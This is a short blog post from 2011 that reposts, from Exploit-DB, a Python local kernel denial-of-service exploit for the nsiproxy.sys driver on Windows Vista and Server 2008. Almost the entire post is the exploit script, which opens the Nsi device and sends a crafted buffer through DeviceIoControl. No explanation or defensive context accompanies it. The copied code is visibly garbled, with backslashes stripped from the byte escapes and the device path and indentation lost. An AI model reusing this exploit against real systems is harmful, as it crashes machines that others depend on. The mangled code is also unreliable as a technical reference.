Skip to content

Windows 2008 server exploit DOS

Published 26/05/2011

#!/usr/bin/python
############################################################################
##
## Title: Microsoft Windows Vista/Server 2008 "nsiproxy.sys" Local Kernel DoS Exploit
## Author: Lufeng Li of Neusoft Corporation
## Vendor: www.microsoft.com
## Vulnerable: Windows Vista/Server 2008
##
############################################################################
from ctypes import *
kernel32 = windll.kernel32
Psapi = windll.Psapi
if __name__ == '__main__':
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
CREATE_ALWAYS = 0x2
SYM_NAME = "\\.\Nsi"
dwReturn = c_ulong()
out_buff = ''
in_buff = ("x00x00x00x00x00x00x00x00xecx2dx39x6ex07x00x00x00"
"x01x00x00x00x00x00x00x00x38x89x6cx01x08x00x00x00"
"x00x00x00x00x00x00x00x00x10xfax78x00x28x00x00x00"
"x38xfax78x00x0cx00x00x00")
handle = kernel32.CreateFileA(SYM_NAME, GENERIC_READ | GENERIC_WRITE,0, None, CREATE_ALWAYS, 0, None)

dev_ioct = kernel32.DeviceIoControl(handle, 0x12003f, in_buff,len(in_buff), out_buff, len(out_buff),byref(dwReturn), None)

 

E o fim do filme é:

2008
2008

Fonte: http://www.exploit-db.com/exploits/17305/

Published in Blog

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.